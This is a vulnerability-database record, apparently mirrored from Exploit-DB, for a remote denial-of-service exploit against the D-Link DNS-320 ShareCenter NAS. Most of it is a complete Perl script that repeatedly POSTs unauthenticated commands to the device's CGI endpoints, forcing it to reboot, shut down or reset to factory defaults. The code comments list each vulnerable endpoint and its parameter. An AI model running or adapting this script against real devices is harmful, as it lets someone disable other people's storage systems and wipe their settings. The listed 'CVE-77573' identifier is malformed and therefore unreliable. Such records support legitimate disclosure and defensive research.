ID
VAR-E-201112-0378
EDB ID
18199
TITLE
D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service) - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service). CVE-77573 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | d link | model: | dns-320 sharecenter | scope: | - | version: | - | Trust: 1.0 |
vendor: | sharecenter | model: | d-link dns-320 | scope: | - | version: | - | Trust: 0.6 |
EXPLOIT
#!/usr/bin/perl
#
# Title: ShareCenter D-Link DNS-320 remote reboot/shutdown/reset (DoS).
# Type: Hardware
# Remote: yes
# Author: rigan - imrigan [sobachka] gmail.com
#
# Tested on:
# Firmware : DNS320-v2.00b06
#
# Security flaws:
# dsk_mgr.cgi allows execute reboot via POST request with parameter cmd=FMT_restart.
# system_mgr.cgi allows execute reboot via POST request with parameter cmd=cgi_restart or cmd=cgi_reboot.
# system_mgr.cgi allows execte shutdown via POST request with parameter cmd=cgi_shutdown.
# wizard_mgr.cgi allows to reset the firmware to default settings via POST request with parameter cmd=cgi_wizard.
use LWP::UserAgent;
print "[*] ShareCenter D-Link DNS-320 Remote Dos Exploit\n";
if (@ARGV != 3){ &usage; }
while (@ARGV > 0){
$ip = shift(@ARGV);
$port = shift(@ARGV);
$mode = shift(@ARGV);
}
@cgi = ("dsk_mgr.cgi", "system_mgr.cgi", "wizard_mgr.cgi", "system_mgr.cgi");
@cmd = ("cmd=FMT_restart", "cmd=cgi_restart", "cmd=cgi_wizard", "cmd=cgi_shutdown");
$url = "http://".$ip.":".$port."/cgi-bin/".$cgi[$mode];
print "[*] DoS............................................. \n";
while(1){
my $ua = new LWP::UserAgent;
my $req = HTTP::Request->new(POST=>$url);
$req->content_type('application/x-www-form-urlencoded');
$req->content($cmd[$mode]);
my $res = $ua->request($req);
}
sub usage(){
print "Usage: perl dlink.pl [target ip] [port] [0,1,2,3] \n";
print "================================================= \n";
print "0 - dsk_mgr.cgi cmd=FMT_restart [Reboot] \n";
print "1 - system_mgr.cgi cmd=cgi_restart [Reboot] \n";
print "2 - wizard_mgr.cgi cmd=cgi_wizard [Reset] \n";
print "3 - system_mgr.cgi cmd=shutdown [Shutdown] \n";
exit;
}
Trust: 1.0
EXPLOIT LANGUAGE
pl
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Reboot/Shutdown/Reset (Denial of Service)
Trust: 1.0
CREDITS
rigan
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 18199 | Trust: 1.6 |
db: | EDBNET | id: | 40652 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/18199/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 18199 |
db: | EDBNET | id: | 40652 |
LAST UPDATE DATE
2022-07-27T09:54:37.919000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 18199 | date: | 2011-12-05T00:00:00 |
db: | EDBNET | id: | 40652 | date: | 2011-12-05T00:00:00 |